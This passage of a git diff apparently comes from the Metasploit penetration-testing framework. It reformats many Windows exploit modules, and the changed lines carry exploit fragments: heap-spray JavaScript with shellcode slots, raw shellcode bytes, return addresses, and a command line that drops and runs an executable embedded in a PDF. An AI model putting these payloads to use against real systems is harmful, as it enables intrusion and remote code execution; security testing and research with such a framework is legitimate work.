Universal', { 'Ret' => 0x0c0c0c0c } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 06 2008')) diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 82c63747dd..ec7d00ac95 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'May 29 2007', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index e554e9afbb..6212c64c43 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote # nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + - rand_text(2, payload_badchars) + rand_text(2, payload_badchars) nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V') nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V') diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 856b95ce90..cd5c9b5aed 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote # makes a long relative jump into the actual payload. # [ 'Windows Vista user32.dll 6.0.6000.16386', - { - 'Ret' => 0x700b, - 'Len' => 2, + { + 'Ret' => 0x700b, + 'Len' => 2, - # On Vista, the pages that contain the RIFF are read-only. - # In-place decoders cannot be used. - 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } - } + # On Vista, the pages that contain the RIFF are read-only. + # In-place decoders cannot be used. + 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } + } ], # diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index da6de82eef..c15c5514eb 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -63,12 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end - def exploit + def exploit ttf_data = make_ttf() js_data = make_js(payload.encoded) @@ -527,20 +527,13 @@ for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; xfa = <<-EOF - - - - 1 - - - - - + +1 + + EOF xref << pdf.length diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index b947c2da10..fe47720cdf 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -72,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end - def exploit + def exploit swf_data = make_swf() js_data = make_js(payload.encoded) diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index cf453b90f4..0485909a86 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2726d67337..69775863b7 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index e1f7d8f59d..58396eacc4 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 40b7e61902..fdc10751dc 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote return hex_payload end - def ioDef(id) + def ioDef(id) "%d 0 obj" % id end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote result end - def ASCIIHexWhitespaceEncode(str) + def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote pdf << "f.SkipLine:Set w=CreateObject^(\"WScript.Shell\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\"%TEMP%\"^)+\"\\\\#{exe_name}\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\"\\\\x\",\" \"^)^)^):" pdf << "for each x in a:g.Write^(Chr^(\"&h\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs" pdf << eol << eol << eol << "#{launch_msg})" - pdf << ">>>>" << endobj + pdf << ">>>>" << endobj xref << pdf.length xrefPosition = pdf.length pdf << "xref" << eol diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index 2423c7a370..d7af0d8451 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) @@ -166,67 +166,67 @@ Original notes on heap technique used in this exploit: ptrs_data << [(daddr+0x44)].pack('V') * 12 ptrs = Rex::Text.to_unescape(ptrs_data) - js_doc = %Q| - function prepareHoles(slide_size) - { - var size = 1000; - var xarr = new Array(size); - var hole = unescape("#{hole}"); - var pad = unescape("%u5858"); - while (pad.length <= slide_size/2 - hole.length) - pad += pad; - for (loop1=0; loop1 < size; loop1+=1) - { - ident = ""+loop1; + js_doc = <<-EOF +function prepareHoles(slide_size) +{ + var size = 1000; + var xarr = new Array(size); + var hole = unescape("#{hole}"); + var pad = unescape("%u5858"); + while (pad.length <= slide_size/2 - hole.length) + pad += pad; + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length); - } - for (loop2=0;loop2<100;loop2++) - { - for (loop1=size/2; loop1 < size-2; loop1+=2) + } + for (loop2=0;loop2<100;loop2++) + { + for (loop1=size/2; loop1 < size-2; loop1+=2) { - xarr[loop1]=null; - xarr[loop1]=pad.substring(0,0x10000/2 )+"A"; - xarr[loop1]=null; + xarr[loop1]=null; + xarr[loop1]=pad.substring(0,0x10000/2 )+"A"; + xarr[loop1]=null; } - } - return xarr; - } + } + return xarr; +} - function prepareMemory(size) - { - var mini_slide_size = 0x1000; - var slide_size = 0x100000; - var xarr = new Array(size); - var pad = unescape("%ucccc"); +function prepareMemory(size) +{ + var mini_slide_size = 0x1000; + var slide_size = 0x100000; + var xarr = new Array(size); + var pad = unescape("%ucccc"); - while (pad.length <= 32 ) - pad += pad; + while (pad.length <= 32 ) + pad += pad; - var nops = unescape("#{nops}"); - while (nops.length <= mini_slide_size/2 - nops.length) - nops += nops; + var nops = unescape("#{nops}"); + while (nops.length <= mini_slide_size/2 - nops.length) + nops += nops; - var shellcode = unescape("#{shellcode}"); - var pointers = unescape("#{ptrs}"); - var chunk = nops.substring(0,32/2) + pointers + + var shellcode = unescape("#{shellcode}"); + var pointers = unescape("#{ptrs}"); + var chunk = nops.substring(0,32/2) + pointers + nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) + shellcode + pad.substring(0,32/2); - chunk=chunk.substring(0,mini_slide_size/2); - while (chunk.length <= slide_size/2) - chunk += chunk; + chunk=chunk.substring(0,mini_slide_size/2); + while (chunk.length <= slide_size/2) + chunk += chunk; - for (loop1=0; loop1 < size; loop1+=1) - { - ident = ""+loop1; + for (loop1=0; loop1 < size; loop1+=1) + { + ident = ""+loop1; xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident; - } - return xarr; - } + } + return xarr; +} - var mem = prepareMemory(200); - var holes = prepareHoles(6500); - this.pageNum = 1; -| + var mem = prepareMemory(200); + var holes = prepareHoles(6500); + this.pageNum = 1; +EOF js_pg1 = %Q|this.print({bUI:true, bSilent:false, bShrinkToFit:false});| # Obfuscate it up a bit diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 44ef267100..edd7ff41c5 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -68,25 +68,26 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - template = %Q| + template = <<-EOF + - - - + + + - -
- - <comment name="Comments" text="Comment" hint="Comment box" left="40" top="76" width="89" height="29" fontname="Times New Roman" fontsize="15" fontcolor="255" visible="1" fontstyle="0" /> - <exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" /> +<main name="MainForm" image_path="" hint="" /> +<title name="Title" text="Title" hint="Title box" left="144" top="48" width="57" height="33" fontname="Times New Roman" fontsize="20" fontcolor="255" visible="1" fontstyle="0" /> +<comment name="Comments" text="Comment" hint="Comment box" left="40" top="76" width="89" height="29" fontname="Times New Roman" fontsize="15" fontcolor="255" visible="1" fontstyle="0" /> +<exitbutton name="ButtonExit" image_path="" image_down_path="" text="Exit" hint="Exit this program" left="120" top="96" width="75" height="25" fontname="MS Sans Serif" fontsize="8" fontcolor="255" visible="1" fontstyle="0" /> </autorun> </DeepBurner_record> -| +EOF seh_offset = 272 path = make_nops(seh_offset) diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index e494161ad9..bcd48e69a1 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -83,11 +83,11 @@ class Metasploit3 < Msf::Exploit::Remote # We utilize a small stub near the end of the buffer space to # continue to the real shellcode... # NOTE: the push is to avoid a badchar (0x5c) - stub = %Q| - push ecx - sub esp,-0x1a8 - ret - | + stub = <<-EOF +push ecx +sub esp,-0x1a8 +ret +EOF stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string m3u[seh_offset - stub.length, stub.length] = stub diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 5447060da9..1332f4fc9b 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), ], self.class) end diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index d3bcbb9457..b79be7c2a5 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote template = %Q|<?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> - <title>Playlist - - - REPLACE_ME - - 0 - - - +Playlist + + +REPLACE_ME + +0 + + + | diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index e384b432e3..923019d0b5 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote targs.each { |targ| print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...") - shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) + shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) email = rand_text_english(19) + [targ.ret].pack('V') + shellcode # Hopefully this structure is correct -- ported from msf 2. Blame me @@ -117,15 +117,15 @@ class Metasploit3 < Msf::Exploit::Remote [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + - [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + # SRV_META_USER [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') + - "\x00\x00\x0a" + # subcommand / success - "\x00\x00" + # nick length / nick - "\x00\x00" + # first length / first - "\x00\x00" + # last length / last - [email.length].pack('v') + email + - "\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x0a" + # subcommand / success + "\x00\x00" + # nick length / nick + "\x00\x00" + # first length / first + "\x00\x00" + # last length / last + [email.length].pack('v') + email + + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index e5b0e41582..12a02bc5e7 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -72,11 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote }, ], [ - 'Windows 2000 Pro SP4 French', - { - 'Platform' => 'win', - 'Ret' => 0x775F29D0, - }, + 'Windows 2000 Pro SP4 French', + { + 'Platform' => 'win', + 'Ret' => 0x775F29D0, + }, ], ], diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 1daa4db35d..ce9a05ed6d 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -38,11 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1000, - 'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" + - "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" + - "\x75\x76\x77\x78\x79\x7a", + 'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'), 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", - }, 'Targets' => [ diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 4e3cac68d2..e8cb509808 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 26 2004', 'DefaultTarget' => 0)) - register_advanced_options( + register_advanced_options( [ OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 0dbc140666..d8b910a861 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -84,9 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote # [ 'vftpd 1.31 - Windows XP SP3 English', { + # call edi in vftpd.exe (v1.31) 'OldRet' => 0x405a73, # not used directly 'Ret' => 0x4058e3, # not used directly - # call edi in vftpd.exe (v1.31) 'Offset' => 16, # distance to saved return 'Adders' => "171,48" # adjust the bottom two bytes } diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 37e5469957..5657084af5 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(26000) - ], self.class) + ], self.class) end def exploit diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index 63f753bde3..1f65f54821 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2004-0608'], + [ 'CVE', '2004-0608'], [ 'OSVDB', '7217'], [ 'BID', '10570'], diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 2b3ce2c47e..18f004f32e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => - { + { 'BufferRegister' => 'ESP' }, }, diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 830e98525d..10b3feb192 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote targ = targets[2] else raise RuntimeError, "Unable to determine a target automatically..." - # if snmp is running you could set the target based on community strings + # if snmp is running you could set the target based on community strings end end diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 886cf976eb..f33f040d21 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class ) + ], self.class ) end def exploit diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 32715765a6..510cbc40c6 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-4305'], - ['OSVDB', '28300'], + ['OSVDB', '28300'], ['BID', '19660'], ], 'DefaultOptions' => diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index f6bd1ebc47..1d7a61c605 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', 'patrick' # MSF3 rewrite, ePO v2.5.1 target ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index e8d304bc05..88437587eb 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-0992'], - ['OSVDB', '24617'], - ['BID', '17503'], + ['OSVDB', '24617'], + ['BID', '17503'], ], 'Privileged' => true, 'Payload' => diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index ef21f017ec..4112aaf641 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2003-0727'], - ['OSVDB', '2449'], + ['OSVDB', '2449'], ['BID', '8375'], ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], ], diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 8de0d3bb15..01f7cdb652 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2006-1148'], - ['OSVDB', '23777'], + ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], ], diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 2e01659447..5ac8400563 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59" # Alphanumeric jmp back (edx context) - req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" + req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index 31aaf09e3b..0b54bc8ea7 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2006-1255' ], + [ 'CVE', '2006-1255' ], [ 'OSVDB', '23950' ], [ 'BID', '17138' ], ], diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 866c8c0624..d99a251961 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -41,14 +41,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f\x3a\x3b\x3c" + - "\x3d\x3e\x3f\x40\x5c" + "Zz", + 'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f" + + (0x3a..0x3f).to_a.pack('C*') + "\x40\x5c" + "Zz", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - # Version-specific return addresses + # Version-specific return addresses ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }], ['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }], diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 31a9f036f4..8a69fcfece 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -31,10 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug. }, - 'Author' => [ + 'Author' => + [ 'Thor Doomen ', # original msf v2 module 'patrick', # msf v3 port :) - ], + ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index dde0d21d08..59d95b1692 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -24,10 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. }, - 'Author' => [ + 'Author' => + [ 'Thor Doomen ', # original msf v2 module 'patrick', # msf v3 port :) - ], + ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 3d0a4ae036..e23baeaaff 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2005-1815'], - ['OSVDB', '16957'], + ['OSVDB', '16957'], ['BID', '13788'], ], 'Privileged' => true, diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 64820de40a..c707d6ff7c 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2003-1141'], - ['OSVDB', '2774'], + ['OSVDB', '2774'], ['BID', '8968'], ['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'], ], diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 92ed926f7c..763f5c3cc7 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1024, 'BadChars' => "\x00\x20", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index 720379aa65..6858f4c50f 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 400, 'BadChars' => "\x00", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index e97e472f3c..fd26ef5233 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 250, 'BadChars' => "\x00\x0a\x0d\x20", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index 375b441f44..72cbe492e3 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only - exploits the first one. + exploits the first one. }, 